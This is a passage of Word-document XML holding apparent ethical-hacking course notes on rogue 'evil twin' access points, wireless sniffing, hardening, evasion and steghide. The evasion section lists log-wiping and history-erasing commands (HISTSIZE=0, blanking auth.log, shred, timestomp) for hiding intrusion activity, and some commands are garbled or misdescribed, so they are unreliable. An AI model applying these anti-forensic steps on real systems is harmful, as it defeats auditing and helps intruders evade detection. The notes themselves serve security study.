        <w:t xml:space="preserve">Can also insert a wordlist as one of the options (-w). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Rogue Access Points (APs)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r w:rsidR="003B567C" w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Explorer</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">, MAC. In Enterprise often a rogue AP might be getting used to </w:t>
      </w:r>
      <w:r>
        <w:t>circumnavigate</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> company internet access rules. </w:t>
      </w:r>
      <w:r>
        <w:t>Share</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> internet with people that might not be meant to have access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Setting up a clone AP which then will become a MITM attack. It gathers all authorisation information. Needs to look identical to the real </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> network. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The real AP needs to be taken down so that yours is the only one that shows up. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In public, set up an AP with no security. People will connect to them for free </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>People</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> might transmit some really good information.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE1E4B" w:rsidRDefault="00CE1E4B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A rogue AP attack is known as an “Evil Twin” attack. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Wireless Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D46C5">
        <w:t>using a wireless i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nterface. Have a look at all of the traffic that goes on the network. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Really just do this because you're interested in the network. Try to discover devices and services that are running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you are more concerned with wireless activity at level 1 or 2 then you could use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>AiroDump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Using W</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">ireshark you kind of need to be connected to the </w:t>
      </w:r>
      <w:r>
        <w:t>SSID</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Using</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B567C">
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> it will grab everything it sees in the air.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE1E4B" w:rsidRDefault="00CE1E4B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A passive wireless sniffing tool is called </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1E4B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kismet</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Protecting your Wireless Setup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A few different ways:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Give your wireless network a name (SSID) that's not so obvious as to what business or enterprise it belongs too.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Make sure you've got some sort of encryption turned on. WEP, WPA or WPA2. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Dis</w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t xml:space="preserve">abling the SSID broadcast is no </w:t>
      </w:r>
      <w:r>
        <w:t>guarantee that they won't find your network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Set up some access policies. Make a basic MAC authentication ACL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A77527">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Evade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - getaway from something.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Evasion is to avoid getting caught.</w:t>
      </w:r>
      <w:r w:rsidR="00A77527">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Might want to avoid a firewall or an intrusion detection system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Lots of different techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log alteration, </w:t>
      </w:r>
      <w:r w:rsidR="00A77527">
        <w:t>they</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A77527">
        <w:t>won’t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> know what </w:t>
      </w:r>
      <w:r w:rsidR="00A77527">
        <w:t>you’ve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> done if </w:t>
      </w:r>
      <w:r w:rsidR="00A77527">
        <w:t>they</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can't see the logs for it</w:t>
      </w:r>
      <w:r w:rsidR="00E92796">
        <w:t xml:space="preserve"> or you’ve changed them</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E92796">
        <w:t xml:space="preserve"> Probably best not to delete all the logs. Change attributes of logs, try and hide exact what you were doing. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E92796" w:rsidRDefault="00E92796" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Disable audit mechanisms – Turn auditing off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Hiding amongst noise. Create loads of noise on the network to hide your activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Do a low and slow attack. Only send a couple of packets here and there and it might not be detected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unicode attack - sending of </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> characters instead of single code </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>asci</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> characters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fragmentation </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - badly fragmented packets can sometimes get through a FW.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00E92796" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bash_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- delete the bash history file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E92796" w:rsidRDefault="00E92796" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92796">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>xport</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E92796">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> HISTSIZE=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Keep 0 records in the history. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Do this first to hide activity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00884756" w:rsidRDefault="00884756" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>WIN: Event V</w:t>
      </w:r>
      <w:r w:rsidRPr="00884756">
        <w:t>iewer</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- delete the whole log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00884756" w:rsidRDefault="00884756" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- clear rev module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00884756" w:rsidRDefault="00884756" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A0182B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0182B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0182B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/log/auth.log</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- good one to clear</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00884756" w:rsidRDefault="00884756" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A0182B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Echo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A0182B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>“ “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0182B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; auth.log</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- wipes the log file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00884756" w:rsidRDefault="00A0182B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0182B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Sed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0182B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> –I ‘/opened/d’ /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0182B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0182B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/log/auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0182B" w:rsidRDefault="00A0182B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nano can edit log files in Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0182B" w:rsidRDefault="00A0182B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A0182B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>History –c</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- clears out history</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0182B" w:rsidRDefault="00A0182B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A0182B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>History –w</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- wipes history pressing up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0182B" w:rsidRDefault="00A0182B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Shred –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>zu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;file&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deletes and overwrites files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD4607" w:rsidRDefault="00AD4607" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Timestomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in Metasploit – change metadata relating to logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00E92796" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E92796">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Become familiar with evasion techniques to better your reputation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avoiding detection. Malicious attackers will have similar techniques so if </w:t>
      </w:r>
      <w:r w:rsidR="00A77527">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can do it so can they!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E92796" w:rsidRDefault="00E92796" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E92796" w:rsidRDefault="00E92796" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**</w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00A77527" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The art of h</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>iding information inside something else.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A really popular use of </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>steganography</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is to take an image and hide some other form of data inside that image.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A77527">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>QuickSteg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is an app to hide text inside an image. Really quite cool and very simple. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A77527">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>StegHide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - embed a file inside another file. Even specify a passphrase to a</w:t>
      </w:r>
      <w:r w:rsidR="00A77527">
        <w:t xml:space="preserve">ccess the embedded information. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Terminal line program. </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux you can put an image inside an image. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="005D00A9" w:rsidRDefault="00640DDF" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Steghide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> embed –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>cf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;.jpg&gt; -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;secrets.txt&gt;</w:t>
      </w:r>
      <w:r w:rsidR="005D00A9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005D00A9">
        <w:t>- hides a jpg inside a txt document</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00640DDF" w:rsidRDefault="00640DDF" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Enter passphrase:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D00A9" w:rsidRPr="005D00A9" w:rsidRDefault="005D00A9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Steghide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>info  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>file&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>- Returns info on the file that’s been embedded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="005D00A9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Steghide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> extract –sf &lt;normal file&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
